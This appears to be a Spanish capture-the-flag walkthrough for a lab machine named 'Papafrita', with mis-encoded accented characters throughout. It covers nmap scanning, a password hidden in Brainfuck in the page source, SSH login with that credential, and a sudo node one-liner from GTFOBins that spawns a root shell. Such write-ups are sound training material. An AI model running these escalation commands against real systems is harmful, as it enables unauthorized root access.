# Papafrita
### 馃攳 **RECONOCIMIENTO**
En primer lugar, tras conectarnos a la m谩quina, utilizamos el comando:
```bash
ping -c 1 192.168.1.80
```
para verificar la conectividad de red.
A continuaci贸n, se realiza el comando:
```bash
nmap -sVC -p- -n --min-rate 5000 192.168.1.80
```
para realizar un escaneo de puertos y servicios detallado en la direcci贸n IP.
Como podemos observar durante el escaneo que el **puerto 22** perteneciente al **servicio SSH** y el **puerto 80** perteneciente al **servicio HTTP** est谩n abiertos por lo que a continuaci贸n se indagar谩 m谩s.
### 馃攷 **EXPLORACI脫N**
Se utiliza el comando:
```bash
sudo nmap -sCV -p22,80 -v 192.168.1.80
```
para obtener m谩s informaci贸n sobre ese puerto espec铆ficamente.
Seguimos indagando m谩s sobre los puertos y ahora exploramos el servicio **HTTP**. Ingresamos la IP y nos encontramos la p谩gina de por defecto de **Apache**.
Revisamos el c贸digo fuente y nos encontramos con un c贸digo escrito en **Brainfuck** por lo que desencriptamos.
### 馃殌 **EXPLOTACI脫N**
Parece ser que **abuelacalientalasopa** es una contrase帽a por lo que suponemos con la l贸gica que el usuario es **abuela**. Sabiendo esto, nos conectamos a trav茅s de **SSH** al usuario con el comando:
```bash
ssh abuela@192.168.1.80
```
### 馃攼 PRIVILEGIOS
Al estar dentro y ejecutar:
```bash
whoami
```
a煤n no somos **root**, por lo que hacemos:
```bash
sudo -l
```
para ver si hay algo para explotar.
Vemos que tenemos permisos sudo con **node** por lo que miramos [GTFOBins](https://gtfobins.github.io/gtfobins/node/) para ver como podemos escalar privilegios.
```bash
sudo -u root node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})'
```
Ya somos **root**.
Te deseo mucho 茅xito en tu b煤squeda de las flags! Recuerda prestar atenci贸n a cada detalle, examinar los archivos y servicios con detenimiento, y utilizar todas las herramientas disponibles para encontrarlas. La clave para el 茅xito est谩 en la perseverancia y en no dejar ning煤n rinc贸n sin explorar. 隆Adelante, hacker! 馃捇馃攳馃殌
